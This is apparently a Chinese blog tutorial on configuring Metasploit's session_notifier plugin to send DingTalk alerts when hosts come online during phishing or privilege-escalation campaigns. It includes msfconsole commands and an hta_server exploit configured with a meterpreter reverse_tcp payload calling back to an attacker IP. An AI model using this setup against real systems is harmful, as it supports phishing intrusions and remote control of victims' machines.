0x01 前言
我们在进行钓鱼攻击或被动提权时可能需要在MSF长期监听某个端口,等待管理员执行上线,但又不可能随时都盯着监听界面,这样就不能及时得知是否有新主机上线,是不是很不方便呢?
最近在metasploit-framework项目中看到安恒@三米前有蕉皮老哥提交的“钉钉通知”拉取请求,现已被rapid7合并到了session_notifier会话通知插件中。
0x01 钉钉机器人webhook配置
我们先在钉钉官网下载Windows客户端并注册一个用户进行登录,然后发起一个群组并在群设置中的智能群助手里添加一个自定义机器人。
机器人的名称可以随便取,在安全设置中添加一个自定义关键字“session”,这是一个不能修改的固定值
0x02 session_notifier插件配置
msfconole命令进入MSF后先用load加载session_notifier插件,将set_session_dingtalk_webhook设置为我们钉钉机器人中的Webhook,然后用start_session_notifier命令开启会话通知即可。
root@:kali~# msfconsole -q msf6 > load session_notifier msf6 > set_session_dingtalk_webhook https://oapi.dingtalk.com/robot/send?access_token= msf6 > start_session_notifier
SessionNotifier Commands:
restart_session_notifier //重新启动会话通知 save_session_notifier_settings //将所有会话通知设置保存到框架 set_session_dingtalk_webhook //设置DingTalk会话通知(关键字: session) set_session_maximum_ip //设置会话通知最大IP范围 set_session_minimum_ip //设置会话通知最小IP范围 set_session_mobile_carrier //设置手机的移动运营商 set_session_mobile_number //设置您要通知的10位手机号码 set_session_smtp_address //设置会话通知SMTP地址 set_session_smtp_from //设置SMTP发件人 set_session_smtp_password //设置SMTP密码 set_session_smtp_port //设置会话通知SMTP端口 set_session_smtp_username //设置SMTP用户名 start_session_notifier //开始会话通知 stop_session_notifier //停止会话通知
随便设置了一个hta_server监听模块来测试一下看是否能够实时收到新上线主机的通知。
msf6 > use exploit/windows/misc/hta_server msf6 exploit(windows/misc/hta_server) > set target 1 msf6 exploit(windows/misc/hta_server) > set payload windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/misc/hta_server) > set lhost 39.**.*.238 msf6 exploit(windows/misc/hta_server) > set lport 443 msf6 exploit(windows/misc/hta_server) > exploit
这里我们可以看到钉钉群组里已经成功的收到了机器人发送过来的新上线主机通知信息!!!
